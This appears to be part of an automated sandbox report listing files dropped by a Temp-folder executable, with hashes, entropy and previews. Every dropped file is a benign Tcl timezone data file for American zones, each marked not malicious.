                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:lG19jJps/Q7Ddh5sBPyNsSLFOMM/EowALVZVmWa86Eac8rQ:lM9jI/4h5sBPy+CMt/ElALLVuAH
                                                                                                                                                                                                                                                                                                                                MD5:2F2C91BD29B32A281F9FB1F811953ACB
                                                                                                                                                                                                                                                                                                                                SHA1:49102C37397CC9B7CDCDCE6A76F9BE03D0B446AB
                                                                                                                                                                                                                                                                                                                                SHA-256:6ABBF55FEE7839B9EEEBB97EA53E185E1A0E189843531257708258841A35EB76
                                                                                                                                                                                                                                                                                                                                SHA-512:FB06D4FE28BD9DD9D56A7365F1E2CC7434678B8850CECF99A232F07B4B720F092980EC337C279E599A12E54548DE6AC253547FE4C255BEFA7B545F8C93375589
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Sitka) {. {-9223372036854775808 53927 0 LMT}. {-3225223727 -32473 0 LMT}. {-2188954727 -28800 0 PST}. {-883584000 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-757353600 -28800 0 PST}. {-31507200 -28800 0 PST}. {-21477600 -25200 1 PDT}. {-5756400 -28800 0 PST}. {9972000 -25200 1 PDT}. {25693200 -28800 0 PST}. {41421600 -25200 1 PDT}. {57747600 -28800 0 PST}. {73476000 -25200 1 PDT}. {89197200 -28800 0 PST}. {104925600 -25200 1 PDT}. {120646800 -28800 0 PST}. {126698400 -25200 1 PDT}. {152096400 -28800 0 PST}. {162381600 -25200 1 PDT}. {183546000 -28800 0 PST}. {199274400 -25200 1 PDT}. {215600400 -28800 0 PST}. {230724000 -25200 1 PDT}. {247050000 -28800 0 PST}. {262778400 -25200 1 PDT}. {278499600 -28800 0 PST}. {294228000 -25200 1 PDT}. {309949200 -28800 0 PST}. {325677600 -
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):208
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.905980413237828
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290txP90e/:MBaIMY9QpI2907P90O
                                                                                                                                                                                                                                                                                                                                MD5:B6E45D20EB8CC73A77B9A75578E5C246
                                                                                                                                                                                                                                                                                                                                SHA1:19C6BB6ED12B6943CF7BDFFE4C8A8D72DB491E44
                                                                                                                                                                                                                                                                                                                                SHA-256:31E60EAC8ABFA8D3DAD501D3BCDCA7C4DB7031B65ADDA24EC11A6DEE1E3D14C3
                                                                                                                                                                                                                                                                                                                                SHA-512:C0F3BF8D106E77C1000E45D0A6C8E7C05B7B97EFA2EECCA45FEF48EB42FBDD5336FD551C794064EADFB6919A12813FF66B2F95722877432B4A48B1FBA6C5409D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/St_Barthelemy) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):10917
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7872036312069963
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:Vvprjhbvd8mSGu9EnkBVAZK2GrbrvZeuqpNFT:Vvbvd7SGu9lzoVpDT
                                                                                                                                                                                                                                                                                                                                MD5:F87531D6DC9AAFB2B0F79248C5ADA772
                                                                                                                                                                                                                                                                                                                                SHA1:E14C52B0F564FA3A3536B7576A2B27D4738CA76B
                                                                                                                                                                                                                                                                                                                                SHA-256:0439DA60D4C52F0E777431BF853D366E2B5D89275505201080954D88F6CA9478
                                                                                                                                                                                                                                                                                                                                SHA-512:5B43CE25D970EEEFD09865D89137388BD879C599191DE8ACE37DA657C142B6DF63143DBF9DED7659CBD5E45BAB699E2A3AFDD28C76A7CB2F300EBD9B74CDA59D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/St_Johns) {. {-9223372036854775808 -12652 0 LMT}. {-2713897748 -12652 0 NST}. {-1664130548 -9052 1 NDT}. {-1650137348 -12652 0 NST}. {-1640982548 -12652 0 NST}. {-1632076148 -9052 1 NDT}. {-1615145348 -12652 0 NST}. {-1609446548 -12652 0 NST}. {-1598650148 -9052 1 NDT}. {-1590100148 -12652 0 NST}. {-1567286948 -9052 1 NDT}. {-1551565748 -12652 0 NST}. {-1535837348 -9052 1 NDT}. {-1520116148 -12652 0 NST}. {-1503782948 -9052 1 NDT}. {-1488666548 -12652 0 NST}. {-1472333348 -9052 1 NDT}. {-1457216948 -12652 0 NST}. {-1440883748 -9052 1 NDT}. {-1425767348 -12652 0 NST}. {-1409434148 -9052 1 NDT}. {-1394317748 -12652 0 NST}. {-1377984548 -9052 1 NDT}. {-1362263348 -12652 0 NST}. {-1346534948 -9052 1 NDT}. {-1330813748 -12652 0 NST}. {-1314480548 -9052 1 NDT}. {-1299364148 -12652 0 NST}. {-1283030948 -9052 1 NDT}. {-1267914548 -12652 0 NS
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):203
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.878034750755565
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290tMp490e/:MBaIMY9QpI290g490O
                                                                                                                                                                                                                                                                                                                                MD5:B149DC2A23F741BA943E5511E35370D3
                                                                                                                                                                                                                                                                                                                                SHA1:3C8D3CFDB329B7ECB90C19D3EB3DE6F33A063ADD
                                                                                                                                                                                                                                                                                                                                SHA-256:36046A74F6BB23EA8EABA25AD3B93241EBB509EF1821CC4BEC860489F5EC6DCA
                                                                                                                                                                                                                                                                                                                                SHA-512:CEB38EC2405A3B0A4E09CDD2D69A11884CCB28DA0FD7CF8B344E1472642A0571674D3ED33C639E745DDEEE741E52B0948B86DFFFD324BB07A9F1A6B9F38F898E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/St_Kitts) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):203
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.89157166321909
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0uPXoFVAIg20uPXhF2IAcGEtkS+IAcGEuPX/:SlSWB9IZaM3y7eoFVAIgpeX290tY90e/
                                                                                                                                                                                                                                                                                                                                MD5:7B7FCA150465F48FAC9F392C079B6376
                                                                                                                                                                                                                                                                                                                                SHA1:1B501288CC00E8B90A2FAD82619B49A9DDBE4475
                                                                                                                                                                                                                                                                                                                                SHA-256:87203A4BF42B549FEBF467CC51E8BCAE01BE1A44C193BED7E2D697B1C3D268C9
                                                                                                                                                                                                                                                                                                                                SHA-512:5E4F7EE08493547A012144884586D45020D83B5838254C257FD341B8B6D3F9E279013D068EFC7D6DF7569DDD20122B3B23E9C93A0017FB64E941A50311ED1F18
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/St_Lucia) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):204
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.888871207225013
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290tXIMFJ490e/:MBaIMY9QpI290tJ490O
                                                                                                                                                                                                                                                                                                                                MD5:7E272CE31D788C2556FF7421F6832314
                                                                                                                                                                                                                                                                                                                                SHA1:A7D89A1A9AC2B61D98690126D1E4C1595E160C8F
                                                                                                                                                                                                                                                                                                                                SHA-256:F0E10D45C929477A803085B2D4CE02EE31FD1DB24855836D02861AD246BC34D9
                                                                                                                                                                                                                                                                                                                                SHA-512:CCDF0B1B5971B77F6FA27F25900DB1AB9A4A4C69E15DCDF4EA35E1E1FC31AAD957C2E5862B411B0155BB1E25E2DD417A89168295317B1E603DA59142D76CE80A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/St_Thomas) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):205
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.876306758637305
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290tzb+Q90e/:MBaIMY9QpI290xyQ90O
                                                                                                                                                                                                                                                                                                                                MD5:52DAAF1636B5B70E0BA2015E9F322A74
                                                                                                                                                                                                                                                                                                                                SHA1:4BD05207601CF6DB467C27052EBB25C9A64DAC96
                                                                                                                                                                                                                                                                                                                                SHA-256:A5B3687BBA1D14D52599CB355BA5F4399632BF98DF4CEB258F9C479B1EA73586
                                                                                                                                                                                                                                                                                                                                SHA-512:E3DE0447236F6EA24D173CCB46EA1A4A31B5FFBCE2A442CD542DA8C54DAD22391FD1CA301776C0FB07CBCF256FC708E61B7BBA682C02EEBE03BECCEA2B6D3BD0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/St_Vincent) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):845
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.182525430299964
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQce7eUFLxsOCX+FmFyyFDVFdPFxFZA8uFZYV:5NecLGO+6yZzXDZA8KZG
                                                                                                                                                                                                                                                                                                                                MD5:1502A6DD85B55B9619E42D1E08C09738
                                                                                                                                                                                                                                                                                                                                SHA1:70FF58E29CCDB53ABABA7EBD449A9B34AC152AA6
                                                                                                                                                                                                                                                                                                                                SHA-256:54E541D1F410AFF34CE898BBB6C7CC945B66DFC9D7C4E986BD9514D14560CC6F
                                                                                                                                                                                                                                                                                                                                SHA-512:99F0EFF9F2DA4CDD6AB508BB85002F38B01BDFDE0CBA1EB2F4B5CA8EAD8AAB645A3C26BECF777DE49574111B37F847EFF9320331AC07E84C8E892B688B01D36B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Swift_Current) {. {-9223372036854775808 -25880 0 LMT}. {-2030201320 -25200 0 MST}. {-1632063600 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-747241200 -21600 0 MDT}. {-732729600 -25200 0 MST}. {-715791600 -21600 1 MDT}. {-702489600 -25200 0 MST}. {-684342000 -21600 1 MDT}. {-671040000 -25200 0 MST}. {-652892400 -21600 1 MDT}. {-639590400 -25200 0 MST}. {-631126800 -25200 0 MST}. {-400086000 -21600 1 MDT}. {-384364800 -25200 0 MST}. {-337186800 -21600 1 MDT}. {-321465600 -25200 0 MST}. {-305737200 -21600 1 MDT}. {-292435200 -25200 0 MST}. {-273682800 -21600 1 MDT}. {-260985600 -25200 0 MST}. {73472400 -21600 0 CST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):329
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.580220354026118
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X5290Em2OHskeRbV1UcgdrV/uFn/acD3/uFn/sb9/uFn/yn:MBp5290EmdHsVH1UDB/uFn/z/uFn/k/N
                                                                                                                                                                                                                                                                                                                                MD5:004588073FADF67C3167FF007759BCEA
                                                                                                                                                                                                                                                                                                                                SHA1:64A6344776A95E357071D4FC65F71673382DAF9D
                                                                                                                                                                                                                                                                                                                                SHA-256:55C18EA96D3BA8FD9E8C4F01D4713EC133ACCD2C917EC02FD5E74A4E0089BFBF
                                                                                                                                                                                                                                                                                                                                SHA-512:ADC834C393C5A3A7BFD86A933E7C7F594AC970A3BD1E38110467A278DC4266D81C3E96394C102E565F05DE7FBBDA623C673597E19BEC1EA26AB12E4354991066
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Tegucigalpa) {. {-9223372036854775808 -20932 0 LMT}. {-1538503868 -21600 0 CST}. {547020000 -18000 1 CDT}. {559717200 -21600 0 CST}. {578469600 -18000 1 CDT}. {591166800 -21600 0 CST}. {1146981600 -18000 1 CDT}. {1154926800 -21600 0 CST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6666
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7481713130223295
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:pJunToVmM7IEc2fVGYu2yeB/T/eleWmBk81kS/kV6kef4zjyvUP/ZbJitpJxSIRj:pAWJv
                                                                                                                                                                                                                                                                                                                                MD5:8FFE81344C31A51489A254DE97E83C3E
                                                                                                                                                                                                                                                                                                                                SHA1:4397D9EDAC304668D95921EF03DFD90F967E772F
                                                                                                                                                                                                                                                                                                                                SHA-256:EF6AF4A3FA500618B37AF3CDD40C475E54347D7510274051006312A42C79F20C
                                                                                                                                                                                                                                                                                                                                SHA-512:F34A6D44499DE5A4E328A8EAFBA5E77B1B8C04A843160D74978398F1545C821C3034FCBD5ADBFAD8D14D1688907C57E7570023ABD3096D4E4C19E3D3C04428B3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Thule) {. {-9223372036854775808 -16508 0 LMT}. {-1686079492 -14400 0 AST}. {670399200 -10800 1 ADT}. {686120400 -14400 0 AST}. {701848800 -10800 1 ADT}. {717570000 -14400 0 AST}. {733903200 -10800 1 ADT}. {752043600 -14400 0 AST}. {765352800 -10800 1 ADT}. {783493200 -14400 0 AST}. {796802400 -10800 1 ADT}. {814942800 -14400 0 AST}. {828856800 -10800 1 ADT}. {846392400 -14400 0 AST}. {860306400 -10800 1 ADT}. {877842000 -14400 0 AST}. {891756000 -10800 1 ADT}. {909291600 -14400 0 AST}. {923205600 -10800 1 ADT}. {941346000 -14400 0 AST}. {954655200 -10800 1 ADT}. {972795600 -14400 0 AST}. {986104800 -10800 1 ADT}. {1004245200 -14400 0 AST}. {1018159200 -10800 1 ADT}. {1035694800 -14400 0 AST}. {1049608800 -10800 1 ADT}. {1067144400 -14400 0 AST}. {1081058400 -10800 1 ADT}. {1099198800 -14400 0 AST}. {1112508000 -10800 1 ADT}. {1
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8058
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7473289441354263
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:hePraC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:hirrn+qvOTFhPI1jFIL
                                                                                                                                                                                                                                                                                                                                MD5:CE6E17F16AA8BAD3D9DB8BD2E61A6406
                                                                                                                                                                                                                                                                                                                                SHA1:7DF466E7BB5EDD8E1CDF0ADC8740248EF31ECB15
                                                                                                                                                                                                                                                                                                                                SHA-256:E29F83A875E2E59EC99A836EC9203D5ABC2355D6BD4683A5AEAF31074928D572
                                                                                                                                                                                                                                                                                                                                SHA-512:833300D17B7767DE74E6F2757513058FF5B25A9E7A04AB97BBBFFAC5D9ADCC43366A5737308894266A056382D2589D0778EEDD85D56B0F336C84054AB05F1079
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Thunder_Bay) {. {-9223372036854775808 -21420 0 LMT}. {-2366733780 -21600 0 CST}. {-1893434400 -18000 0 EST}. {-883594800 -18000 0 EST}. {-880218000 -14400 1 EWT}. {-769395600 -14400 1 EPT}. {-765396000 -18000 0 EST}. {18000 -18000 0 EST}. {9961200 -14400 1 EDT}. {25682400 -18000 0 EST}. {41410800 -14400 1 EDT}. {57736800 -18000 0 EST}. {73465200 -14400 1 EDT}. {89186400 -18000 0 EST}. {94712400 -18000 0 EST}. {126248400 -18000 0 EST}. {136364400 -14400 1 EDT}. {152085600 -18000 0 EST}. {167814000 -14400 1 EDT}. {183535200 -18000 0 EST}. {199263600 -14400 1 EDT}. {215589600 -18000 0 EST}. {230713200 -14400 1 EDT}. {247039200 -18000 0 EST}. {262767600 -14400 1 EDT}. {278488800 -18000 0 EST}. {294217200 -14400 1 EDT}. {309938400 -18000 0 EST}. {325666800 -14400 1 EDT}. {341388000 -18000 0 EST}. {357116400 -14400 1 EDT}. {372837600
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8470
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.767364707906483
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:mb4O5mC2ZCAFBWsBNwj/lpmlOxGcKcnRH31t+ucgge:Q5DaYaNwj/lpmlOxnKcndIG
                                                                                                                                                                                                                                                                                                                                MD5:F76D5FB5BC773872B556A6EDF660E5CC
                                                                                                                                                                                                                                                                                                                                SHA1:3FD19FCD0FFD3308D2E7D9A3553C14B6A6C3A903
                                                                                                                                                                                                                                                                                                                                SHA-256:170540AA3C0962AFE4267F83AC679241B2D135B1C18E8E7220C2608B94DDDE0E
                                                                                                                                                                                                                                                                                                                                SHA-512:7FC5D2BC39EF3A3C902A56272474E28CD9C56DE37A7AE9FAEADE974993677CCF3A9E6CE64C064D69B7587BD47951BFFFD751412D97F4066656CBB42AD9B619DF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Tijuana) {. {-9223372036854775808 -28084 0 LMT}. {-1514736000 -25200 0 MST}. {-1451667600 -28800 0 PST}. {-1343062800 -25200 0 MST}. {-1234803600 -28800 0 PST}. {-1222963200 -25200 1 PDT}. {-1207242000 -28800 0 PST}. {-873820800 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-761677200 -28800 0 PST}. {-686073600 -25200 1 PDT}. {-661539600 -28800 0 PST}. {-504892800 -28800 0 PST}. {-495039600 -25200 1 PDT}. {-481734000 -28800 0 PST}. {-463590000 -25200 1 PDT}. {-450284400 -28800 0 PST}. {-431535600 -25200 1 PDT}. {-418230000 -28800 0 PST}. {-400086000 -25200 1 PDT}. {-386780400 -28800 0 PST}. {-368636400 -25200 1 PDT}. {-355330800 -28800 0 PST}. {-337186800 -25200 1 PDT}. {-323881200 -28800 0 PST}. {-305737200 -25200 1 PDT}. {-292431600 -28800 0 PST}. {-283968000 -28800 0 PST}. {189331200 -28800 0 PST}. {199274400 -25200 1 PDT}. {21560
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):10883
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7202964099536917
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:9wUYG1dbgZ8UMrEUWraC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:9wS1dbgZ8UMrVWrrn+qvOTFhPI1jFIL
                                                                                                                                                                                                                                                                                                                                MD5:9C60AFDFA3BA2002BA68673B778194CF
                                                                                                                                                                                                                                                                                                                                SHA1:D6D17C82AEC4B85BA7B0F6FCB36A7582CA26A82B
                                                                                                                                                                                                                                                                                                                                SHA-256:7744DB6EFE39D636F1C88F8325ED3EB6BF8FA615F52A60333A58BCE579983E87
                                                                                                                                                                                                                                                                                                                                SHA-512:3C793BB00725CF37474683EAB70A0F2B2ACAE1656402CDD7E75182988DC20361A8651A624A5220983E3E05333B9817DCBEAF20D34BD55C5128F55474A02A9455
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Toronto) {. {-9223372036854775808 -19052 0 LMT}. {-2366736148 -18000 0 EST}. {-1632070800 -14400 1 EDT}. {-1615140000 -18000 0 EST}. {-1609441200 -18000 0 EST}. {-1601753400 -14400 1 EDT}. {-1583697600 -18000 0 EST}. {-1567357200 -14400 1 EDT}. {-1554667200 -18000 0 EST}. {-1534698000 -14400 1 EDT}. {-1524074400 -18000 0 EST}. {-1503248400 -14400 1 EDT}. {-1492365600 -18000 0 EST}. {-1471798800 -14400 1 EDT}. {-1460916000 -18000 0 EST}. {-1440954000 -14400 1 EDT}. {-1428861600 -18000 0 EST}. {-1409504400 -14400 1 EDT}. {-1397412000 -18000 0 EST}. {-1378054800 -14400 1 EDT}. {-1365962400 -18000 0 EST}. {-1346605200 -14400 1 EDT}. {-1333908000 -18000 0 EST}. {-1315155600 -14400 1 EDT}. {-1301853600 -18000 0 EST}. {-1283706000 -14400 1 EDT}. {-1270404000 -18000 0 EST}. {-1252256400 -14400 1 EDT}. {-1238954400 -18000 0 EST}. {-1220806800
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):202
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.854311472609309
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290RRKl290e/:MBaIMY9QpI290V90O
                                                                                                                                                                                                                                                                                                                                MD5:B931564D937C807282F1432FF6EA52A6
                                                                                                                                                                                                                                                                                                                                SHA1:7ECA025D97717EEA7C91B5390122D3A47A25CAD0
                                                                                                                                                                                                                                                                                                                                SHA-256:FF5CF153C4EC65E7E57A608A481F12939B6E4ACC8D62C5B01FEB5A04769A6F07
                                                                                                                                                                                                                                                                                                                                SHA-512:97271500C7D7959B90A6AC0A98D5D0D29DA00E92F9FC973594267DF906DEE767243698DBA2F3A0CF00156E949E29CDDD45A151F263583514090717CFDF1FB4DD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Tortola) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9495
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7630000632404426
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:2f7f/5LB6xi9C7Nf+aNwj/lpmlOxnKcndIG:2f735LB6xi9cfefnK6
                                                                                                                                                                                                                                                                                                                                MD5:1ACC41DA124C0CA5E67432760FDC91EC
                                                                                                                                                                                                                                                                                                                                SHA1:13F56C3F53076E0027BB8C5814EC81256A37F4AF
                                                                                                                                                                                                                                                                                                                                SHA-256:DFC19B5231F6A0AB9E9B971574FB612695A425A3B290699DF2819D46F1250DB0
                                                                                                                                                                                                                                                                                                                                SHA-512:2F2E358F5743248DE946B90877EFCCCACAF039956249F17D24B7DA026830A181A125045E2C8937A6ACD674E32887049F2D36A1941F09803DF514ADCDA4055CC5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Vancouver) {. {-9223372036854775808 -29548 0 LMT}. {-2713880852 -28800 0 PST}. {-1632060000 -25200 1 PDT}. {-1615129200 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-747237600 -25200 1 PDT}. {-732726000 -28800 0 PST}. {-715788000 -25200 1 PDT}. {-702486000 -28800 0 PST}. {-684338400 -25200 1 PDT}. {-671036400 -28800 0 PST}. {-652888800 -25200 1 PDT}. {-639586800 -28800 0 PST}. {-620834400 -25200 1 PDT}. {-608137200 -28800 0 PST}. {-589384800 -25200 1 PDT}. {-576082800 -28800 0 PST}. {-557935200 -25200 1 PDT}. {-544633200 -28800 0 PST}. {-526485600 -25200 1 PDT}. {-513183600 -28800 0 PST}. {-495036000 -25200 1 PDT}. {-481734000 -28800 0 PST}. {-463586400 -25200 1 PDT}. {-450284400 -28800 0 PST}. {-431532000 -25200 1 PDT}. {-418230000 -28800 0 PST}. {-400082400 -25200 1 PDT}. {-386
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):201
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.901732290886438
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290RXgr490e/:MBaIMY9QpI290xg090O
                                                                                                                                                                                                                                                                                                                                MD5:DEB77B4016D310DFB38E6587190886FB
                                                                                                                                                                                                                                                                                                                                SHA1:B308A2D187C153D3ED821B205A4F2D0F73DA94B0
                                                                                                                                                                                                                                                                                                                                SHA-256:A6B8CFE8B9381EC61EAB553CFA2A815F93BBB224A6C79D74C08AC54BE4B8413B
                                                                                                                                                                                                                                                                                                                                SHA-512:04A0D598A24C0F3A1881D3412352F65C610F75281CC512B46248847A798A12AEA551E3DE9EA3FD5BB6B3687A0BB65746392F301F72746876D30697D66B3A3604
                                                                                                                                                                                                                                                                                                                                Malicious:false
